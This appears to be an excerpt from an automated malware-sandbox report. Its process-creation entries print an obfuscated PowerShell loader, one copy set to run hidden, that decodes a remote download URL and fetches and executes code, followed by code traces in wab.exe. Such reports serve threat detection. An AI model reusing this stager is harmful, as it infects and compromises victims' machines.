';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublueJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848F174FB push ebx; iretd 3_2_00007FF848F1756A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848F1756B push ebx; iretd 3_2_00007FF848F1756A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848F100BD pushad ; iretd 3_2_00007FF848F100C1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_076008C2 push eax; mov dword ptr [esp], ecx6_2_07600AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910D130 pushad ; ret 6_2_0910D13B
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910D13C push es; retf 6_2_0910D1C5
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910CB46 push edx; ret 6_2_0910CB4F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910C5D1 push ebp; ret 6_2_0910C5D7
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_09113FDB pushad ; ret 6_2_09113FFF
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910DA02 push ebp; ret 6_2_0910DA03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910F036 push E305BC40h; retf 6_2_0910F03B
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910D237 push es; iretd 6_2_0910D23E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910D428 push es; ret 6_2_0910D442
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910DC29 push edx; ret 6_2_0910DC2F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910D444 push es; ret 6_2_0910D442
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910FE90 push es; ret 6_2_0910FE9E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910B895 push D3F93C37h; ret 6_2_0910B8B3
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0911408C push ds; ret 6_2_09114097
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910CCB1 push ecx; retf 6_2_0910CCB4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0910D0E2 pushad ; ret 6_2_0910D0E3
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_091138E7 pushad ; retf 6_2_091138E9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_091102E6 push es; retf 6_2_091102EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0376CB46 push edx; ret 9_2_0376CB4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0376D130 pushad ; ret 9_2_0376D13B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0376D13C push es; retf 9_2_0376D1C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0376C5D1 push ebp; ret 9_2_0376C5D7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_03773FDB pushad ; ret 9_2_03773FFF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0376D444 push es; ret 9_2_0376D442
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0376F036 push E305BC40h; retf 9_2_0376F03B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0376D237 push es; iretd 9_2_0376D23E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0376D428 push es; ret 9_2_0376D442
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
